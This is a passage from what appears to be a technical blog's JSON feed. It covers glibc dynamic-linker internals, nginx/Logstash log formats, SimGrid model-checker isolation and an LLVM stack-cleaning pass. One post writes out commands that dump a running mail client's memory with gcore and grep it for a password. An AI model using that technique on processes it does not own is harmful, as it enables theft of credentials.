#ifndef SHARED\n# define GLRO(name) _##name\n#else\n# ifdef IS_IN_rtld\n#  define GLRO(name) _rtld_local_ro._##name\n# else\n#  define GLRO(name) _rtld_global_ro._##name\n# endif\n\nstatic void\ndlopen_doit (void *a)\n{\n  struct dlopen_args *args = (struct dlopen_args *) a;\n\n  if (args->mode & ~(RTLD_BINDING_MASK | RTLD_NOLOAD | RTLD_DEEPBIND\n                     | RTLD_GLOBAL | RTLD_LOCAL | RTLD_NODELETE\n                     | __RTLD_SPROF))\n    GLRO(dl_signal_error) (0, NULL, NULL, _(\"invalid mode parameter\"));\n\n  args->new = GLRO(dl_open) (args->file ?: \"\", args->mode | __RTLD_DLOPEN,\n                             args->caller,\n                             args->file == NULL ? LM_ID_BASE : NS,\n                             __dlfcn_argc, __dlfcn_argv, __environ);\n}\n
\n\n\n

The dynamic linker exposes a set of callbacks to the application in the\n_rtld_global_ro object:

\n
struct rtld_global_ro {\n  // [...]\n  void *(*_dl_open) (const char *file, int mode, const void *caller_dlopen,\n                     Lmid_t nsid, int argc, char *argv[], char *env[]);\n  void (*_dl_close) (void *map);\n  // [...]\n};\n
\n\n\n

This _rtld_global_ro object is defined in ld.so:

\n
\n25: 0000000000220cc0   304 OBJECT  GLOBAL DEFAULT   15 _rtld_global_ro@@GLIBC_PRIVATE\n
\n\n

and used in libdl.so:

\n
\n13: 0000000000000000     0 OBJECT  GLOBAL DEFAULT  UND _rtld_global_ro@GLIBC_PRIVATE (7)\n
\n\n

dlclose() and dlmopen() use the same mechanism.

\n

dlsym()

\n

The dlsym() function directly uses the _dl_sym() function of ld.so:

\n
static void\ndlsym_doit (void *a)\n{\n  struct dlsym_args *args = (struct dlsym_args *) a;\n\n  args->sym = _dl_sym (args->handle, args->name, args->who);\n}\n
\n\n\n

dlvsym() and dladdr() use the same mechanism.

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/15/recover-a-password-in-a-process-memory/", "title": "Recover a (forgotten) password in a process memory", "url": "https://www.gabriel.urdhr.fr/2015/01/15/recover-a-password-in-a-process-memory/", "date_published": "2015-01-15T00:00:00+01:00", "date_modified": "2015-01-15T00:00:00+01:00", "tags": ["computer", "system"], "content_html": "

Today, I managed to forget a password but I had an Icedove (Thunderbird) process\nrunning containing the password.

\n

The first thing to do is to take a core dump of the process:

\n
# I don't want other people to read my core dump:\numask 077\n\n# I don't want my core dump to be written on disk, let's go on a tmpfs:\ncd /tmp\n\ngcore -o core $(pgrep icedove)
\n\n\n

The basic idea is to use strings to extract all the strings in the core\ndump and filter out as many entries as possible: you start with strings core |\nuniq | less and add filters to the pipeline to remove as many entries as\npossible.

\n

I ended up with something similar to this:

\n
strings core.2169 |\n# Remove some useless stuff:\ngrep -v ZZZ | grep -v /usr | grep -v /lib | grep -v /bin |\n# Add constraints on the characters used in the password:\ngrep [0-9] | grep [a-z] | grep [A-Z] |\n# Add constraints on the length of the password:\ngrep -Ev '.{20}' | grep -E '.{5}' |\n# Let's look at what's left:\nuniq | less\n
\n\n\n

There were still more than 36000 entries, but I searched for another password that I\nremembered and the forgotten password was a few lines away from it.\n\"\ud83d\ude04\"

\n

Don't forget to remove (or shred) the core file:

\n
rm core.*\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/11/logstash-vhost-combined/", "title": "nginx, Logstash and vhost-combined log format", "url": "https://www.gabriel.urdhr.fr/2015/01/11/logstash-vhost-combined/", "date_published": "2015-01-11T00:00:00+01:00", "date_modified": "2015-01-11T00:00:00+01:00", "tags": ["computer", "log", "http", "apache", "nginx"], "content_html": "

The Apache HTTP server ships with a\nsplit-logfile\nutility which parses Combined Log File entries prefixed with the virtual host:\nsome notes about this and its inclusion in nginx and\nlogstash.

\n

Apache

\n

This is the format expected by split-logfile:

\n
www.gabriel.urdhr.fr ::1 - - [08/Jan/2015:23:51:34 +0100] \"GET / HTTP/1.1\" 304 0 \"-\" \"Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0\"\n
\n\n\n

It can be configured in Apache with:

\n
LogFormat \"%v %h %l %u %t \\\"%r\\\" %>s %b \\\"%{Referer}i\\\" \\\"%{User-agent}i\\\"\" combined_vhost\n\n# For reference those are the definitions for the standard log formats:\nLogFormat \"%h %l %u %t \\\"%r\\\" %>s %b\" common\nLogFormat \"%h %l %u %t \\\"%r\\\" %>s %b \\\"%{Referer}i\\\" \\\"%{User-agent}i\\\"\" combined
\n\n\n

The split-logfile utility reads this and generates separate log files for each\nvirtual host:

\n
/usr/sbin/split-logfile < access.log\n
\n\n\n

Parsing with logstash or grok

\n

Logstash (or any grok-based software)\ncan be taught to process this in patterns/grok-patterns with:

\n
COMBINED_VHOST %{HOSTNAME:vhost} %{COMBINEDAPACHELOG}\n
\n\n\n

which extends the predefined formats:

\n
COMMONAPACHELOG %{IPORHOST:clientip} %{USER:ident} %{USER:auth} \\[%{HTTPDATE:timestamp}\\] \"(?:%{WORD:verb} %{NOTSPACE:request}(?: HTTP/%{NUMBER:httpversion})?|%{DATA:rawrequest})\" %{NUMBER:response} (?:%{NUMBER:bytes}|-)\nCOMBINEDAPACHELOG %{COMMONAPACHELOG} %{QS:referrer} %{QS:agent}\n
\n\n\n

Used in a configuration file such as:

\n
input {\n  file {\n    path => ['/var/log/nginx/access.log']\n    start_position => beginning\n  }\n}\n\nfilter {\n  mutate {\n    replace => {\n      \"type\" => \"access\"\n    }\n  }\n  grok {\n    match => {\n      \"message\" => \"%{COMBINED_VHOST}\"\n    }\n  }\n}\n\noutput {\n  stdout {\n    codec => rubydebug\n  }\n}\n
\n\n\n

nginx

\n

nginx can be configured to generate a similar type of log with:

\n
log_format combined_vhost '$server_name $remote_addr - $remote_user [$time_local] '\n                    '\"$request\" $status $body_bytes_sent '\n                    '\"$http_referer\" \"$http_user_agent\"';\n\n# For reference:\nlog_format common   '$remote_addr - $remote_user [$time_local] '\n                    '\"$request\" $status $body_bytes_sent ';\n# This one is predefined:\nlog_format combined '$remote_addr - $remote_user [$time_local] '\n                    '\"$request\" $status $body_bytes_sent '\n                    '\"$http_referer\" \"$http_user_agent\"';\n
\n\n\n

Logging the requested virtual host

\n

Those configurations log the configured virtual host, not the requested virtual\nhost (the content of the Host HTTP header). If you want to log the content of\nthe Host HTTP header, you can use:

\n\n
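For nginx, a sketch of such a format (using the `$http_host` variable, which holds the raw Host header; the format name `vhost_requested` is a hypothetical name chosen here):

```nginx
log_format vhost_requested '"$http_host" $remote_addr - $remote_user [$time_local] '
                           '"$request" $status $body_bytes_sent '
                           '"$http_referer" "$http_user_agent"';
```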

As the header can contain spaces, it should be quoted. split-logfile won't\nwork well with this format and the logstash/grok pattern will have to be adapted.

\n

Appendix: other web logging stuff

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/01/06/simgrid-mc-isolation/", "title": "Better isolation for SimGridMC", "url": "https://www.gabriel.urdhr.fr/2015/01/06/simgrid-mc-isolation/", "date_published": "2015-01-06T00:00:00+01:00", "date_modified": "2015-01-06T00:00:00+01:00", "tags": ["simgrid", "system", "computer", "linker", "linux", "simulation", "elf"], "content_html": "

In an attempt to simplify the development around the SimGrid\nmodel-checker, we were thinking about moving the model-checker out into\na different process. A different approach would be to use\ndynamic-linker isolation of the different components of the process.\nHere's a summary of the goals, problems and design issues surrounding\nthese topics.

\n

Current state

\n

SimGrid architecture

\n

The design of the SimGrid simulator is based on the design of an\noperating system.

\n

In a typical OS, we have a kernel managing a global state and\nseveral userspace processes running on top of the kernel. The kernel\nschedules the execution of the different processes (and their\nthreads) on the available CPUs. The kernel provides an API to the\nprocesses made of several system calls.

\n
\n \n \n Process\n \n Process\n \n Process\n \n Process\n\n \n System calls\n \n OS kernel\n \n
\n\n

SimGrid simulates a distributed system: it simulates a network and lets\nthe different processes of the simulated system use this simulated\nnetwork. Each simulated process runs on top of the SimGrid kernel.\nThe SimGrid kernel schedules the execution of the different processes\non the available OS threads. The SimGrid kernel provides an API to the\nprocesses made of several simulation calls.

\n
\n \n \n Process\n \n Process\n \n Process\n \n Process\n \n Simulation calls\n\n \n SimGrid kernel\n \n
\n\n

In order to reduce the cost of context switching between the different\nprocesses, in the current implementation of SimGrid all the simulated\nprocesses and the SimGrid kernel live in the same OS process: there is\nno MMU-enforced separation of memory between the simulated processes.\nThey are expected to communicate with each other only using\nthe means provided by the SimGrid kernel (the simulation calls)\nand should not share mutable memory.

\n
\n \n \n \n Process\n \n Process\n \n Process\n \n Process\n\n \n Simulation calls\n \n SimGrid kernel\n \n \n \n \n System calls\n \n OS kernel\n \n \n
\n\n

The SimGrid kernel has a dedicated stack and each simulated process has its\nown stack: cooperative multitasking (fibers, ucontext) is used to\nswitch between the different contexts (SimGrid kernel/process) and is\nused by the SimGrid kernel to schedule the execution of the different\nprocesses.

\n

The same (libc) heap is shared between the SimGrid kernel and the\nsimulated processes.

\n

SimGridMC architecture

\n

The SimGrid model-checker is a dynamic analysis component for SimGrid.\nIt explores the different possible interleavings of execution of the\nsimulated processes (depending on the execution of their transitions\ni.e. the different possible orderings of their communications).

\n

In order to do this, the MC saves, at each node of the graph of\npossible executions, the state of the system:

\n\n

Those states are then used to:

\n\n

In the current implementation, the model-checker lives in the same\nprocess as the main SimGrid process (the SimGrid kernel and the\nprocesses):

\n
\n \n \n \n\n \n Process\n \n Process\n \n Process\n \n Process\n \n Simulation calls\n \n SimGrid kernel\n \n Model-checker\n\n \n \n
\n\n

Multiple heaps

\n

However, the model-checker needs to maintain its own\nstate: the state of the model-checker must not be saved, compared and\nrestored with the rest of the state.

\n

In order to do this, the state of the model-checker is maintained in a\nsecond heap:

\n\n

This is implemented by overriding malloc(), free() and friends\nin order to support multiple heaps. A global variable is used to choose\nthe current working heap:

\n
// Simplified code\nxbt_mheap_t __mmalloc_current_heap = NULL;\n\nvoid *malloc(size_t n)\n{\n  return mmalloc(__mmalloc_current_heap, n);\n}\n\nvoid free(void *ptr)\n{\n  return mfree(__mmalloc_current_heap, ptr);\n}\n
\n\n\n

Limitation of the approach

\n

The current implementation is complicated and not easy to understand and\nmaintain:

\n\n

A first motivation for modifying the architecture of SimGridMC is to increase\nthe maintainability of the SimGridMC codebase.

\n

Another related goal is to simplify the debugging experience (of the simulated\napplication, the SimGrid kernel and the model-checker). For example, the current\nversion of SimGridMC does not work under valgrind. A solution which would\nprovide a more powerful debugging experience would be a valuable tool for the\nSimGridMC devs but more importantly for the users of SimGridMC.

\n

Process-based isolation

\n

For all these reasons, we would like to move the model-checker into a\nseparate process: a model-checker process maintains the model-checker\nstate and controls the execution of a model-checked process.

\n
\n \n \n \n Process\n \n Process\n \n Process\n \n Process\n\n \n Simulation calls\n \n SimGrid kernel\n \n \n \n \n Model-checking interface\n \n Model-checker\n \n \n
\n\n

Memory snapshot/restoration

\n

The snapshotting/restoration of the model-checked process memory can be\ndone using /proc/${pid}/mem or process_vm_readv() and\nprocess_vm_writev().

\n

As long as the OS threads are living on stacks which are not managed\nby the state snapshot/restoration mechanism, they will not be\naffected: we must take care that the OS threads switch to unmanaged\nstacks when we are doing the state snapshots/restorations.

\n

Another solution would be to use ptrace() with PTRACE_GETREGSET\nand PTRACE_SETREGSET in order to snapshot/restore the registers of\neach thread but we would like to avoid this in order to be able to use\nptrace() for debugging or other\npurposes.

\n

File descriptors restoration

\n

Linux does not provide a way to change the file descriptors of another process:\nthe restoration of the file descriptors must be done in the target OS process\nand cannot be done from the model-checker process. Cooperation of the model-checked\nprocess is needed for the file descriptor restoration.

\n

We could abuse ptrace()-based syscall rewriting techniques or some\nsort of parasite injection in order to\nachieve this.

\n

Dynamic-linker based isolation

\n

Another idea would be to create a custom dynamic linker with namespace\nsupport in order to be able to link multiple instances of the same\nlibrary and provide isolation between different parts of the process.

\n

This could be used to:

\n\n

Prior art in DCE with dlmopen()

\n

It turns out that\nDCE\nalready uses a similar approach to load multiple application instances along\nwith Linux kernel implementations (and their network stack)\non top of the NS3 packet-level network simulator\nin the same process:\nthe applications and the Linux kernel are compiled as shared objects (the latter\nforming a library OS, the liblinux.so shared object)\nand loaded multiple times in the same process alongside the NS3 instance.

\n

Among several alternative\nstrategies,\nDCE uses the dlmopen()\nfunction. This is a variant of\ndlopen() originating from\nSunOS/Solaris and\nimplemented in the GNU userland which allows loading dynamic libraries in\nseparate namespaces:

\n\n

An alternative implementation of the ld.so dynamic linker,\nelf-loader, is used which\nprovides additional\nfeatures:

\n\n

More information about dlmopen()\ncan be found in an old version of the Sun\nLinkers and Libraries Guide.

\n

A custom dynamic loader/linker on top of libc

\n

However, I was envisioning something slightly different: instead of\nwriting a replacement for ld.so (using raw system calls), I was\nthinking about building the custom dynamic linker on top of libc and\nlibdl in order to be able to use libc (malloc()), libdl and\nlibelf instead of raw system calls.

\n

Impact on debuggability

\n

In a split-process design, the model-checker could be a quite standard\napplication avoiding any black magic (introspection with /proc/self/maps and\nDWARF, snapshotting/restoration of the state with memcpy(), custom mmalloc()\nimplementation with multiple heaps). Once a relevant trajectory of the\nmodel-checked application has been identified, it could be replayed outside of\nthe model-checker and debugged in this simpler mode.

\n

However, having a single process could lead to a better debugging experience:\none could combine breakpoints in the model-checker, the SimGrid kernel\nand the simulated application with conditions spanning all those components.

\n

At the same time,\nusing multiple dynamic-linking namespaces could make the debugging\nexperience more complicated. I'm not sure how well it is supported by the\ndifferent available debugging tools. The DCE tools seem to show that it is\nreasonably well supported by\nGDB\nand\nvalgrind.

\n

Conclusion

\n

So we have two possible directions:

\n\n

The first solution provides better isolation of the model-checker.\nThe second solution is closer to the current implementation and\nshould have better performance by avoiding context switches and\nIPC in favour of direct memory access and function calls. Moreover, the\ndynamic-linker-based isolation could be reused for other parts of the\nproject (such as the isolation of the simulated MPI processes).

\n

It is not clear which solution would provide the better debugging experience for\nthe user and which solution would be better for the maintainability of\nSimGridMC.

\n

Appendix: dlmopen() quick demo

\n

This simple program creates three new namespaces and loads libpthread in those\nnamespaces:

\n
#define _GNU_SOURCE\n#include <dlfcn.h>\n\n#include <unistd.h>\n\nint main(int argc, const char** argv)\n{\n  size_t i;\n  for (i=0; i!=3; ++i) {\n    void* x = dlmopen(LM_ID_NEWLM, \"libpthread.so.0\", RTLD_NOW);\n    if (!x)\n      return 1;\n  }\n  while(1) sleep(200000);\n  return 0;\n}\n
\n\n\n

We see that libpthread is loaded thrice. Each instance has its own libc\ninstance as well (and a fourth one is loaded for the main program):

\n
00400000-00401000 r-xp 00000000 08:06 7603474                            /home/myself/temp/a.out\n00600000-00601000 rw-p 00000000 08:06 7603474                            /home/myself/temp/a.out\n0173a000-0175b000 rw-p 00000000 00:00 0                                  [heap]\n7fca7ac7d000-7fca7ae1c000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7ae1c000-7fca7b01c000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b01c000-7fca7b020000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b020000-7fca7b022000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b022000-7fca7b026000 rw-p 00000000 00:00 0\n7fca7b026000-7fca7b03e000 r-xp 00000000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b03e000-7fca7b23d000 ---p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b23d000-7fca7b23e000 r--p 00017000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b23e000-7fca7b23f000 rw-p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b23f000-7fca7b243000 rw-p 00000000 00:00 0\n7fca7b243000-7fca7b3e2000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b3e2000-7fca7b5e2000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b5e2000-7fca7b5e6000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b5e6000-7fca7b5e8000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b5e8000-7fca7b5ec000 rw-p 00000000 00:00 0\n7fca7b5ec000-7fca7b604000 r-xp 00000000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b604000-7fca7b803000 ---p 00018000 08:01 2625992                    
/lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b803000-7fca7b804000 r--p 00017000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b804000-7fca7b805000 rw-p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7b805000-7fca7b809000 rw-p 00000000 00:00 0\n7fca7b809000-7fca7b9a8000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7b9a8000-7fca7bba8000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bba8000-7fca7bbac000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bbac000-7fca7bbae000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bbae000-7fca7bbb2000 rw-p 00000000 00:00 0\n7fca7bbb2000-7fca7bbca000 r-xp 00000000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bbca000-7fca7bdc9000 ---p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bdc9000-7fca7bdca000 r--p 00017000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bdca000-7fca7bdcb000 rw-p 00018000 08:01 2625992                    /lib/x86_64-linux-gnu/libpthread-2.19.so\n7fca7bdcb000-7fca7bdcf000 rw-p 00000000 00:00 0\n7fca7bdcf000-7fca7bf6e000 r-xp 00000000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7bf6e000-7fca7c16e000 ---p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7c16e000-7fca7c172000 r--p 0019f000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7c172000-7fca7c174000 rw-p 001a3000 08:01 2626010                    /lib/x86_64-linux-gnu/libc-2.19.so\n7fca7c174000-7fca7c178000 rw-p 00000000 00:00 0\n7fca7c178000-7fca7c17b000 r-xp 00000000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c17b000-7fca7c37a000 ---p 00003000 08:01 2626017                    
/lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c37a000-7fca7c37b000 r--p 00002000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c37b000-7fca7c37c000 rw-p 00003000 08:01 2626017                    /lib/x86_64-linux-gnu/libdl-2.19.so\n7fca7c37c000-7fca7c39c000 r-xp 00000000 08:01 2625993                    /lib/x86_64-linux-gnu/ld-2.19.so\n7fca7c568000-7fca7c56b000 rw-p 00000000 00:00 0\n7fca7c59a000-7fca7c59c000 rw-p 00000000 00:00 0\n7fca7c59c000-7fca7c59d000 r--p 00020000 08:01 2625993                    /lib/x86_64-linux-gnu/ld-2.19.so\n7fca7c59d000-7fca7c59e000 rw-p 00021000 08:01 2625993                    /lib/x86_64-linux-gnu/ld-2.19.so\n7fca7c59e000-7fca7c59f000 rw-p 00000000 00:00 0\n7fffa8481000-7fffa84a2000 rw-p 00000000 00:00 0                          [stack]\n7fffa85f5000-7fffa85f7000 r-xp 00000000 00:00 0                          [vdso]\n7fffa85f7000-7fffa85f9000 r--p 00000000 00:00 0                          [vvar]\nffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]\n
\n\n\n

The new namespaces are probably not fully functional in this state:\nthere are probably conflicts to solve in the different instances. For example,\neach libc probably tries to manage the same heap with sbrk().

"}, {"id": "http://www.gabriel.urdhr.fr/2014/11/03/not-cleaning-the-stack/", "title": "Avoiding to clean the stack", "url": "https://www.gabriel.urdhr.fr/2014/11/03/not-cleaning-the-stack/", "date_published": "2014-11-03T00:00:00+01:00", "date_modified": "2014-11-03T00:00:00+01:00", "tags": ["computer", "simgrid", "compilation", "assembly", "x86_64"], "content_html": "

In two previous posts, I looked into cleaning the stack frame of a function before using it, by adding assembly at the beginning of each function. This was done either by modifying LLVM with a custom codegen pass or by rewriting the assembly between the compiler and the assembler. The current implementation adds a loop at the beginning of every function. We now look at the impact of this modification on the performance of the application.

\n

Update: this is an updated version of the post with fixed\ncode and updated results (the original version of the code was\nbroken).

\n

Initial results

\n

Here are the initial results:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Test | Normal | Stack cleaning
ctest (complete testsuite) | 348.06s | 387.53s
ctest -R mc-bugged1-liveness-visited-ucontext-sparse | 1.53s | 2.00s
run_test comm dup 4 | 42.54s | 127.80s
\n

On big problems, the overhead of the stack-cleaning modification becomes very important: run_test comm dup 4 is roughly three times slower.

\n

Optimisation

\n

We would like to avoid the overhead of the stack-cleaning code. In order\nto do this we can use the following facts:

\n\n

Thus, we can disable stack-cleaning if we detect that we are not\nexecuting the application code. This can be implemented in two ways:

\n\n

In order to evaluate the efficiency of this approach, we use a simple comparison of %rsp with a constant value:

\n
    movq $0x7fff00000000, %r11\n    cmpq %r11, %rsp\n    jae .Lstack_cleaner_done0\n    movabsq $3, %r11\n.Lstack_cleaner_loop0:\n    movq    $0, -32(%rsp,%r11,8)\n    subq    $1, %r11\n    jne     .Lstack_cleaner_loop0\n.Lstack_cleaner_done0:\n    # Main code of the function goes here\n
\n\n\n

The value is hardcoded in this prototype but it could be loaded from a\nglobal variable instead.
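In C, the guard amounts to comparing the current stack pointer against a threshold stored in a global. A sketch with made-up names (maybe_clean_frame() and stack_cleaner_limit are not part of the actual tool):

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical threshold: addresses above it belong to the main stack,
 * addresses below it to the simulated processes' stacks. Stored in a
 * global so that it could be adjusted at startup. */
uintptr_t stack_cleaner_limit = 0x7fff00000000ULL;

/* C model of the guarded prologue: wipe the given frame only when the
 * current stack pointer is below the threshold, i.e. when running on a
 * simulated process's stack rather than on the main stack. */
void maybe_clean_frame(void* frame, size_t size)
{
  uintptr_t sp = (uintptr_t)&sp;  /* rough stand-in for %rsp */
  if (sp < stack_cleaner_limit)
    memset(frame, 0, size);
}
```

With a global variable, the hardcoded `movabsq`/`cmpq` pair in the prologue would become a single %rip-relative `cmpq` against the variable.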

\n

Here are the results with this optimisation:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Test | Normal | Stack cleaning
ctest (complete testsuite) | 348.06s | 372.95s
ctest -R mc-bugged1-liveness-visited-ucontext-sparse | 1.53s | 1.53s
run_test comm dup 4 | 42.54s | 36.68s
\n

Appendix: reproducibility

\n

Those results were generated with:

\n
MAKEFLAGS=\"-j$(nproc)\"\n\ngit clone https://gforge.inria.fr/git/simgrid/simgrid.git\ncd simgrid\ngit checkout cd84ed2b393b564f5d8bfdaae60b814f81f24dc4\nsimgrid=\"$(pwd)\"\n\nmkdir build-normal\ncd build-normal\ncmake .. -Denable_model-checking=ON -Denable_documentation=OFF \\\n  -Denable_compile_warnings=ON -Denable_smpi_MPICH3_testsuite=ON\nmake $MAKEFLAGS\ncd ..\n\nmkdir build-zero\ncd build-zero\ncmake .. -Denable_model-checking=ON -Denable_documentation=OFF \\\n  -Denable_compile_warnings=ON -Denable_smpi_MPICH3_testsuite=ON \\\n  -DCMAKE_C_COMPILER=\"$simgrid/tools/stack-cleaner/cc\" \\\n  -DCMAKE_CXX_COMPILER=\"$simgrid/tools/stack-cleaner/c++\" \\\n  -DGFORTRAN_EXE=\"$simgrid/tools/stack-cleaner/fortran\"\nmake $MAKEFLAGS\ncd ..\n\nrun_test() {\n  (\n  platform=$(find $simgrid -name small_platform_with_routers.xml)\n  hostfile=$(find $simgrid | grep mpich3-test/hostfile$)\n\n  local base\n  base=$(pwd)\n  cd $base/teshsuite/smpi/mpich3-test/$1/\n\n  $base/bin/smpirun -hostfile $hostfile -platform $platform \\\n    --cfg=maxmin/precision:1e-9 --cfg=network/model:SMPI \\\n    --cfg=network/TCP_gamma:4194304 \\\n    -np $3 --cfg=model-check:1 \\\n    --cfg=smpi/send_is_detached_thres:0 --cfg=smpi/coll_selector:mpich \\\n    --cfg=contexts/factory:ucontext --cfg=model-check/max_depth:100000 \\\n    --cfg=model-check/reduction:none --cfg=model-check/visited:100000 \\\n    --cfg=contexts/stack_size:4 --cfg=model-check/sparse-checkpoint:yes \\\n    --cfg=model-check/soft-dirty:no ./$2 > /dev/null\n  )\n}\n
\n\n\n

The results without the optimisation are obtained by removing the\nrelevant assembly from the clean-stack-filter script.

"}, {"id": "http://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-in-a-llvm-pass/", "title": "Cleaning the stack in a LLVM pass", "url": "https://www.gabriel.urdhr.fr/2014/10/06/cleaning-the-stack-in-a-llvm-pass/", "date_published": "2014-10-06T00:00:00+02:00", "date_modified": "2014-10-06T00:00:00+02:00", "tags": ["computer", "simgrid", "llvm", "compilation", "assembly", "x86_64"], "content_html": "

In the previous episode, we implemented an LLVM pass which does nothing. Now we modify it to create a (proof-of-concept) LLVM pass which fills the current stack frame with zeros before using it.

\n

Structure of the x86-64 stack

\n

Basic structure

\n

The top (in fact the bottom) of the stack is stored in the %rsp register: a push operation decrements %rsp and stores the value at the resulting address; conversely, a pop operation loads the value from the top of the stack and increments %rsp. Stack variables are allocated by decrementing %rsp.

\n

A function call (call) pushes the current value of the instruction pointer (%rip) on the stack. A return instruction (ret) pops a value from the stack into %rip.

\n

A typical call frame contains in order:

\n\n
\n
    \n
parameter for f()
parameter for f()
return address to caller of f()
local variable for f()
local variable for f()
parameter for g()
parameter for g()
return address to f() (caller of g())
local variable for g()
local variable for g() ← %rsp

x86-64 stack structure for f() calls g()
\n
\n\n

For example this C code,

\n
int f();\n\nint main(int argc, char** argv) {\n  int i = 42;\n  f();\n  return 0;\n}\n
\n\n\n

is compiled (with clang -S -fomit-frame-pointer example.c) into this (using AT&T syntax):

\n
main:\n    subq    $24, %rsp\n    movl    $0, 20(%rsp)\n    movl    %edi, 16(%rsp)\n    movq    %rsi, 8(%rsp)\n    movl    $42, 4(%rsp)\n    movb    $0, %al\n    callq   f\n    movl    $0, %edi\n    movl    %eax, (%rsp)\n    movl    %edi, %eax\n    addq    $24, %rsp\n    ret\n
\n\n\n

Memory is allocated on the stack using subq. Local variables are\nusually referenced by offsets from the stack pointer, OFFSET(%rsp).

\n

Frame pointer

\n

The x86 (32 bit) ABI uses %rbp as the base of the stack frame. This is not mandatory in the x86-64 ABI but the compiler might still use a frame pointer; in that case, the base of the current stack frame is stored in %rbp.

\n
\n
    \n
parameter for f()
parameter for f()
return address to caller of f()
saved %rbp from caller of f() ← saved %rbp
local variable for f()
local variable for f()
parameter for g()
parameter for g()
return address to f() (caller of g())
saved %rbp from f() ← %rbp
local variable for g()
local variable for g() ← %rsp

x86-64 stack structure for f() calls g() with frame pointer
\n
\n\n

Here is the same program compiled with -fno-omit-frame-pointer:

\n
main:\n    pushq   %rbp\n    movq    %rsp, %rbp\n    subq    $32, %rsp\n    movl    $0, -4(%rbp)\n    movl    %edi, -8(%rbp)\n    movq    %rsi, -16(%rbp)\n    movl    $42, -20(%rbp)\n    movb    $0, %al\n    callq   f\n    movl    $0, %edi\n    movl    %eax, -24(%rbp)\n    movl    %edi, %eax\n    addq    $32, %rsp\n    popq    %rbp\n    ret\n
\n\n\n

When a frame pointer is used, stack memory is usually referenced as a fixed offset from %rbp: OFFSET(%rbp).

\n

Red zone

\n

The x86 32-bit ABI did not allow the code of a function to use memory beyond the top of the stack: a signal handler could at any moment overwrite any memory past the top of the stack.

\n

The standard x86-64 ABI allows the code of the current function to use the 128 bytes past the top of the stack (the red zone): the OS must set up signal handler frames beyond the red zone. The red zone can be used for temporary variables or for the local variables of leaf functions (functions which do not call other functions).

\n
\n
    \n
parameter for f()
parameter for f()
return address to caller of f()
local variable for f()
local variable for f()
parameter for g()
parameter for g()
return address to f() (caller of g())
local variable for g()
local variable for g() ← %rsp
red zone
…
red zone

x86-64 stack structure for f() calls g() (with the red zone)
\n
\n\n

Note: Windows systems do not use the standard x86-64 ABI: the usage of the registers is different and there is no red zone.

\n

Let's make main() a leaf function:

\n
int main(int argc, char** argv) {\n  int i = 42;\n  return 0;\n}\n
\n\n\n

The variables are allocated in the red zone (negative offsets from the\nstack pointer):

\n
main:\n        movl    $0, %eax\n        movl    $0, -4(%rsp)\n        movl    %edi, -8(%rsp)\n        movq    %rsi, -16(%rsp)\n        movl    $42, -20(%rsp)\n        ret\n
\n\n\n

Cleaning the stack

\n

Assembly

\n

Here is the code we are going to add at the beginning of each\nfunction:

\n
    movq $QSIZE, %r11\n.Lloop:\n        movq $0, OFFSET(%rsp,%r11,8)\n        subq $1, %r11\n        jne  .Lloop\n
\n\n\n

for some suitable values of QSIZE and OFFSET.
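The effect of the loop can be modelled in C: for i = QSIZE down to 1, it stores an 8-byte zero at offset OFFSET + 8·i from %rsp. A sketch with an explicit buffer standing in for the stack (clean_frame_words() is a made-up name):

```c
#include <stdint.h>

/* C model of the prologue loop: base plays the role of %rsp + OFFSET
 * and qsize the role of QSIZE. Writes zeros at base[1] .. base[qsize],
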